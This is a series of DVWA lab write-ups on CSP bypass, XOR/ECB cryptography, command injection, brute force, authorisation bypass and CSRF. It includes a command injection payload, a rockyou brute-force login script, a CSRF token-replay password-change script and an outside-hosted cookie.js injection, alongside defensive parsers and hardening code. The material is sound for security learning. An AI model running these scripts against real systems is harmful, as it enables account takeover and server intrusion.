James Cao
DVWA CSP Bypass

DVWA CSP Bypass Low/Medium/High Security

Description
Vulnerability: CSP Bypass
Impact: bypass the Content Security Policy and inject JavaScript of our choosing.

LOW Security Level
This level sends the following policy:

    $headerCSP = "Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com https://digi.ninja ;"; // allows js from self, pastebin.com, hastebin.com, jquery, digi.ninja, and google analytics.

Because https://digi.ninja is an allowed script source, any script hosted there is trusted by the browser, so we can load https://digi.ninja/dvwa/cookie.js.

MEDIUM Security Level
The policy changes to:

    $headerCSP = "Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';";

The nonce is a fixed string in the source rather than a fresh random value per response, so any inline script carrying nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=" is allowed to run. ('unsafe-inline' is listed as well, but a browser that understands nonces ignores 'unsafe-inline' once a nonce or hash is present, so the reusable nonce is what makes this level exploitable.) The payload is: ...
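The checks described above can be scripted. The following is an added example, not code from the DVWA project or from this writeup: it parses a Content-Security-Policy header value, lists the third-party script hosts a policy trusts (the LOW weakness), and flags a nonce that repeats across responses (the MEDIUM weakness). The two policy strings are copied from the $headerCSP lines quoted above; the `seen_nonces` argument stands in for nonces collected from earlier responses.

```python
"""Parse a CSP header and report what script-src permits.
Added example, not DVWA's code. Policy strings below are copied from the writeup."""

# Copied from the two $headerCSP strings on the page (value part only).
LOW_CSP = ("script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com "
           "code.jquery.com https://ssl.google-analytics.com https://digi.ninja ;")
MEDIUM_CSP = "script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';"


def parse_csp(header):
    """Return {directive: [source expressions]} for a CSP header (with or without
    the 'Content-Security-Policy:' prefix)."""
    if header.lower().startswith("content-security-policy:"):
        header = header.split(":", 1)[1]
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def script_src_findings(policy, seen_nonces=()):
    """Summarise the script-src directive (falling back to default-src).
    seen_nonces: nonces observed on previous responses; a nonce that shows up
    again is effectively static and can be reused by an attacker."""
    sources = policy.get("script-src", policy.get("default-src", []))
    findings = {"hosts": [], "unsafe_inline": False, "nonces": []}
    for src in sources:
        low = src.lower()
        if low == "'unsafe-inline'":
            findings["unsafe_inline"] = True
        elif low.startswith("'nonce-"):
            findings["nonces"].append(src[len("'nonce-"):-1])
        elif low.startswith("'"):
            continue  # 'self', 'none', hashes, 'strict-dynamic' ...
        else:
            findings["hosts"].append(src)  # every host here can serve attacker JS
    findings["static_nonce"] = any(n in seen_nonces for n in findings["nonces"])
    # CSP Level 2+: 'unsafe-inline' is ignored once a nonce or hash is present,
    # so with a nonce in the list it is the nonce, not 'unsafe-inline', that counts.
    findings["unsafe_inline_effective"] = findings["unsafe_inline"] and not findings["nonces"]
    return findings


def report(header, seen_nonces=()):
    """Human-readable lines for one policy."""
    f = script_src_findings(parse_csp(header), seen_nonces)
    lines = [f"third-party script hosts: {', '.join(f['hosts']) or 'none'}"]
    if f["unsafe_inline_effective"]:
        lines.append("'unsafe-inline' is effective: any inline script runs")
    if f["static_nonce"]:
        lines.append(f"nonce {f['nonces'][0]} repeats across responses: reusable")
    return lines


if __name__ == "__main__":
    print("LOW:", *report(LOW_CSP), sep="\n  ")
    # Pretend we already saw this nonce on an earlier response.
    print("MEDIUM:", *report(MEDIUM_CSP, seen_nonces=("TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=",)), sep="\n  ")
```

To use it against a live target, fetch the page twice and pass the first response's nonce as `seen_nonces` when analysing the second; a proper nonce never matches.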

October 16, 2025 · 1 min
DVWA Cryptography

DVWA Cryptography Low/Medium/High Security

Description
Vulnerability: Cryptography
Impact: decode the encoded string to recover the correct password.

LOW Security Level
In the source code the password is decoded like this:

    $decoded = xor_this (base64_decode ($password), $key);

So the value is first Base64-decoded and then XORed with the key, which is wachtwoord. I used CyberChef to decode the encoded string.

Result: Your new password is: Olifant

MEDIUM Security Level
The tokens are encrypted with an Electronic Code Book mode cipher (AES-128-ECB). AES-128 is a 128-bit block cipher: 128 bits is 16 bytes, but to keep things human readable the bytes are shown as hex, two characters per byte, which gives a block size of 32 characters. ...
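Both decoding steps above can be reproduced without CyberChef. The following is an added example, not DVWA's code: it re-implements the LOW-level `base64_decode` followed by `xor_this` (assumed here to be a plain repeating-key XOR, which is what the CyberChef XOR recipe computes), and for the MEDIUM level it splits a hex-encoded ECB token into 32-character blocks, finds blocks that repeat, and rebuilds a token from chosen blocks. The sample token is constructed; no AES is performed, because the block handling is the same whatever the key.

```python
"""LOW: base64 + repeating-key XOR decode. MEDIUM: hex/ECB block handling.
Added example, not DVWA's code. xor_this() is assumed to be repeating-key XOR."""
import base64

KEY = "wachtwoord"   # the key named in the DVWA source
BLOCK_HEX = 32       # AES block = 16 bytes = 32 hex characters


def xor_this(data: bytes, key: str) -> bytes:
    """Repeating-key XOR: byte i is XORed with key[i % len(key)] (assumed semantics)."""
    k = key.encode()
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(data))


def decode_password(encoded: str, key: str = KEY) -> str:
    """Mirror of: $decoded = xor_this(base64_decode($password), $key);"""
    return xor_this(base64.b64decode(encoded), key).decode()


def encode_password(plain: str, key: str = KEY) -> str:
    """Inverse direction, used to build a test vector; XOR is its own inverse."""
    return base64.b64encode(xor_this(plain.encode(), key)).decode()


def split_blocks(token_hex: str):
    """Cut a hex token into 16-byte (32 hex char) cipher blocks."""
    if len(token_hex) % BLOCK_HEX:
        raise ValueError("token is not a whole number of 16-byte blocks")
    return [token_hex[i:i + BLOCK_HEX] for i in range(0, len(token_hex), BLOCK_HEX)]


def repeated_blocks(token_hex: str):
    """ECB leaks equality: identical plaintext blocks give identical ciphertext blocks,
    so repeats in the ciphertext tell you where the plaintext repeats."""
    blocks = split_blocks(token_hex)
    return sorted({b for b in blocks if blocks.count(b) > 1})


def splice_blocks(token_hex: str, mapping: dict):
    """Rebuild a token from chosen block positions, e.g. {1: 3} puts block 3 in slot 1.
    ECB has no chaining, so each block decrypts independently of its neighbours."""
    blocks = split_blocks(token_hex)
    return "".join(blocks[mapping.get(i, i)] for i in range(len(blocks)))


# Constructed sample token: four blocks A, B, A, C (block 0 and block 2 identical).
BLOCK_A, BLOCK_B, BLOCK_C = "a1" * 16, "b2" * 16, "c3" * 16
SAMPLE_TOKEN = BLOCK_A + BLOCK_B + BLOCK_A + BLOCK_C

if __name__ == "__main__":
    enc = encode_password("Olifant")
    print("encoded:", enc, "-> decoded:", decode_password(enc))
    print("blocks:", split_blocks(SAMPLE_TOKEN))
    print("repeated:", repeated_blocks(SAMPLE_TOKEN))
    print("spliced:", splice_blocks(SAMPLE_TOKEN, {1: 3}))
```

Feed a real MEDIUM-level token to `split_blocks` and compare tokens for two different users: the blocks that differ are the ones carrying user-specific data, and those are the ones worth swapping.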

October 16, 2025 · 2 min
DVWA Command Injection

DVWA Command Injection Low/Medium/High Security

Description
Vulnerability: Command Injection
Impact: run commands on the server through the ping function.

LOW Security Level
At the LOW level the ping function applies no filter or regex to the input, so whatever we enter reaches the shell as-is and we can append further commands. Example:

    1.1.1.1; id

This payload pings 1.1.1.1 and then runs id. The result is:

    PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
    64 bytes from 1.1.1.1: icmp_seq=1 ttl=52 time=63.0 ms
    64 bytes from 1.1.1.1: icmp_seq=2 ttl=52 time=93.5 ms
    64 bytes from 1.1.1.1: icmp_seq=3 ttl=52 time=76.8 ms
    64 bytes from 1.1.1.1: icmp_seq=4 ttl=52 time=50.4 ms
    --- 1.1.1.1 ping statistics ---
    4 packets transmitted, 4 received, 0% packet loss, time 3005ms
    rtt min/avg/max/mdev = 50.401/70.910/93.461/16.016 ms
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

The last line is the output of id: the injected command ran as www-data, the web server user. ...
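To see why the `;` works and what a fix looks like, here is an added example that is not DVWA's PHP source. The vulnerable function mirrors the pattern of pasting user input into a shell command line; `echo` stands in for ping so the demo runs offline, and the injected command is `echo INJECTED` rather than `id` so the output is deterministic. The hardened version allow-lists the target as an IP address and passes an argv list with no shell. It assumes a POSIX shell and Linux ping (`-c` for the count).

```python
"""Why "1.1.1.1; id" works and two ways to stop it.
Added example, not DVWA's code. 'echo' stands in for ping; POSIX shell assumed."""
import ipaddress
import shlex
import subprocess

PAYLOAD_FROM_PAGE = "1.1.1.1; id"            # the payload used in the writeup
DEMO_PAYLOAD = "1.1.1.1; echo INJECTED"      # constructed: same shape, harmless


def vulnerable_ping(target):
    """Input is spliced into a shell string: ';' ends the first command and the
    rest of the input runs as a second command, as the web server user."""
    cmd = f"echo pinging {target}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def quoted_ping_cmd(target):
    """Mitigation 1: shell-quote the argument so ';', '|', '`' stay literal.
    Still string-based, so treat it as defence in depth, not the primary control."""
    return f"echo pinging {shlex.quote(target)}"


def is_valid_target(target):
    """Mitigation 2 (preferred): allow-list the input as an IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return False


def build_ping_argv(target, count=4):
    """Hardened: validate, then build an argv list so no shell ever parses it."""
    if not is_valid_target(target):
        raise ValueError(f"not an IP address: {target!r}")
    return ["ping", "-c", str(count), target]


def safe_ping(target, count=4):
    """Run the hardened command (needs a ping binary and network, so not run in tests)."""
    return subprocess.run(build_ping_argv(target, count),
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    print(vulnerable_ping(DEMO_PAYLOAD))       # second line proves the injected command ran
    print(quoted_ping_cmd(PAYLOAD_FROM_PAGE))  # echo pinging '1.1.1.1; id'
    print(is_valid_target(PAYLOAD_FROM_PAGE))  # False
    print(build_ping_argv("1.1.1.1"))          # ['ping', '-c', '4', '1.1.1.1']
```

The allow-list plus argv approach is the one to copy: it rejects the payload before anything is executed, and even a hostname-shaped input that slipped past validation would arrive at ping as a single argument.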

October 16, 2025 · 2 min
DVWA Brute Force

DVWA Brute Force Low/Medium/High Security

Description
Vulnerability: Brute Force
Impact: brute-force the admin account and obtain its credentials.

LOW Security Level
This is a simple script I wrote to brute-force the admin account with the rockyou.txt wordlist. Replace PHPSESSID with your own session ID.

    import requests

    baseUrl = "http://localhost/DVWA/vulnerabilities/brute/"
    cookies = {
        "PHPSESSID": "91fdcd96e5376633ef607edd0a1b8093",  # replace with your own session ID
        "security": "low"
    }

    try:
        # rockyou.txt is not valid UTF-8 throughout; skip undecodable bytes instead of crashing mid-list
        with open('/usr/share/wordlists/rockyou.txt', encoding='latin-1', errors='ignore') as file:
            for line in file:
                password = line.rstrip("\r\n")
                # send the credentials as params so characters like & and # are URL-encoded
                params = {"Login": "Login", "username": "admin", "password": password}
                try:
                    print(f"Attempting: password={password}")
                    res = requests.get(baseUrl, params=params, cookies=cookies)
                    # the login page echoes this message on failure; anything else means success
                    if "Username and/or password incorrect." not in res.text:
                        print()
                        print("=> Password found: ", password)
                        exit()
                except requests.exceptions.RequestException as e:
                    print("Request error:", e)
                    continue
    except FileNotFoundError as e:
        print("File not found:", e)

MEDIUM Security Level
The only difference between the LOW and MEDIUM levels is in the login-failed branch: ...

October 16, 2025 · 2 min
DVWA Authorisation Bypass

DVWA Authorisation Bypass Low/Medium/High Security

Description
Vulnerability: Authorisation Bypass
Impact: exploit missing authorisation checks to reach the user management page.

LOW Security Level
The source code performs no authorisation check at all. Log in as gordonb / abc123 (a non-admin account); because nothing is checked, you can browse straight to the URL:

    http://localhost/DVWA/vulnerabilities/authbypass/

MEDIUM Security Level
The source code now includes a check:

    /* Only the admin user is allowed to access this page. Have a look at these two files for possible vulnerabilities:
     * vulnerabilities/authbypass/get_user_data.php
     * vulnerabilities/authbypass/change_user_details.php
     */
    if (dvwaCurrentUser() != "admin") {
        print "Unauthorised";
        http_response_code(403);
        exit;
    }

This check is in the page itself, and the comment points at the two files that actually read and change user data. Let's look at them. Visiting get_user_data.php we get: ...
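The MEDIUM-level check above illustrates a general pattern worth testing for: an authorisation check on the page that renders a UI, with separate endpoints doing the data work. The following is an added example written for this page, not DVWA's code, and it says nothing about what the two DVWA files actually do; it models an index page guarded by the equivalent of `if (dvwaCurrentUser() != "admin")`, data endpoints with and without the same guard, and the probe an attacker runs to find which endpoints a non-admin user can still call. The users and records are constructed.

```python
"""Per-endpoint authorisation: guarding the page is not enough.
Added example, not DVWA's code; users and data below are constructed."""
import functools

# Constructed accounts and records; gordonb is the non-admin user from the writeup.
USERS = {"admin": {"is_admin": True}, "gordonb": {"is_admin": False}}
USER_DATA = {"admin": {"first_name": "admin"}, "gordonb": {"first_name": "Gordon"}}


class Forbidden(Exception):
    """Stands in for print "Unauthorised"; http_response_code(403); exit;"""


def require_admin(handler):
    """Decorator form of: if (dvwaCurrentUser() != "admin") { 403; exit; }"""
    @functools.wraps(handler)
    def guarded(current_user, *args, **kwargs):
        if USERS.get(current_user, {}).get("is_admin") is not True:
            raise Forbidden("Unauthorised")
        return handler(current_user, *args, **kwargs)
    return guarded


# --- before: only the page that draws the user manager is guarded ---
@require_admin
def index_page(current_user):
    return "user manager"


def get_user_data_unguarded(current_user):
    """Returns every record to whoever asks; the page's check never runs here."""
    return dict(USER_DATA)


def change_user_details_unguarded(current_user, username, **fields):
    USER_DATA[username].update(fields)
    return dict(USER_DATA[username])


# --- after: every endpoint enforces the same check itself ---
get_user_data = require_admin(get_user_data_unguarded)
change_user_details = require_admin(change_user_details_unguarded)


def reachable(current_user, endpoints):
    """Names of endpoints a user can call without a 403: the probe an attacker runs
    after logging in with a low-privilege account."""
    out = []
    for name, fn in endpoints.items():
        try:
            fn(current_user)
            out.append(name)
        except Forbidden:
            pass
    return out


if __name__ == "__main__":
    before = {"index": index_page, "get_user_data": get_user_data_unguarded}
    after = {"index": index_page, "get_user_data": get_user_data}
    print("gordonb, page-only check:", reachable("gordonb", before))   # ['get_user_data']
    print("gordonb, per-endpoint check:", reachable("gordonb", after))  # []
```

The test to run on a real application is the second half of this: take the non-admin session and call each back-end endpoint the admin page fetches, directly and with the same parameters, and compare the responses with those the admin gets.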

October 16, 2025 · 2 min
Exploiting IMPOSSIBLE Security Level CSRF - DVWA

DVWA's CSRF Challenge
This challenge is built around a password reset form that lets the admin change their password. The first three levels can be exploited as follows:

LOW Security Level: a URL with the correct parameters is enough; a GET request to it changes the password.
MEDIUM Security Level: this level checks the Referer header, which should match the origin the request came from. Since that header is under the sender's control in a direct request, a simple curl command can exploit this level.
HIGH Security Level: this is where it gets interesting: every password-change request needs a CSRF token. It is still not hard to exploit; a Python script can do it.

For more information: https://github.com/jameskaois/dvwa-vulnerabilities/tree/main/csrf ...
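The HIGH-level flow (fetch the form, read the per-request token, submit the change with it) as an added example. This is not the script from the linked repository or DVWA's own code. It assumes, as DVWA's CSRF page does, that the token is in a hidden input named user_token and that the change form sends password_new, password_conf and Change as GET parameters; the URL, the session cookie, the sample form and the "Password Changed." success text are placeholders or constructed here. An offline stand-in session is included so the whole flow can be exercised without a server.

```python
"""HIGH-level CSRF: read the token, then replay it with the password change.
Added example, not the repository's script. Form field names are assumed from DVWA."""
import re

DVWA_CSRF_URL = "http://localhost/DVWA/vulnerabilities/csrf/"   # placeholder
TOKEN_RE = re.compile(r"name=['\"]user_token['\"]\s+value=['\"]([^'\"]+)['\"]")

# Constructed fragment of the change-password form; stands in for the real page offline.
SAMPLE_FORM = """<form action="#" method="GET">
  <input type="password" name="password_new">
  <input type="password" name="password_conf">
  <input type="submit" value="Change" name="Change">
  <input type='hidden' name='user_token' value='0123456789abcdef0123456789abcdef' />
</form>"""


def extract_token(html):
    """Pull the hidden user_token out of the form markup."""
    m = TOKEN_RE.search(html)
    if not m:
        raise ValueError("no user_token in page")
    return m.group(1)


def build_change_params(token, new_password):
    """Query parameters of the change request (field names assumed from DVWA's form)."""
    return {"password_new": new_password, "password_conf": new_password,
            "Change": "Change", "user_token": token}


def change_password(session, new_password, url=DVWA_CSRF_URL):
    """Two requests on one session: the token is checked against the one stored in that
    session, so reading it and sending it straight back passes the check."""
    token = extract_token(session.get(url).text)
    resp = session.get(url, params=build_change_params(token, new_password))
    return "Password Changed" in resp.text  # success text assumed


class OfflineSession:
    """Stand-in for requests.Session: serves the constructed form and accepts a change
    only when it carries the token it issued and both password fields match."""
    class _Resp:
        def __init__(self, text):
            self.text = text

    def __init__(self):
        self.issued = extract_token(SAMPLE_FORM)

    def get(self, url, params=None):
        if params is None:
            return self._Resp(SAMPLE_FORM)
        ok = (params.get("user_token") == self.issued
              and params.get("password_new") == params.get("password_conf"))
        return self._Resp("<pre>Password Changed.</pre>" if ok
                          else "<pre>CSRF token is incorrect</pre>")


if __name__ == "__main__":
    print("offline demo:", change_password(OfflineSession(), "newpass"))
    # Against a real instance (placeholders): attach the victim's cookies first.
    # import requests
    # s = requests.Session()
    # s.cookies.set("PHPSESSID", "<session id>"); s.cookies.set("security", "high")
    # print(change_password(s, "newpass"))
```

The point the offline session makes explicit is that the token only defends against a cross-site page that cannot read the response; whoever can read the form (the session holder, or a script running in the page's origin) can always forge the request.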

October 11, 2025 · 3 min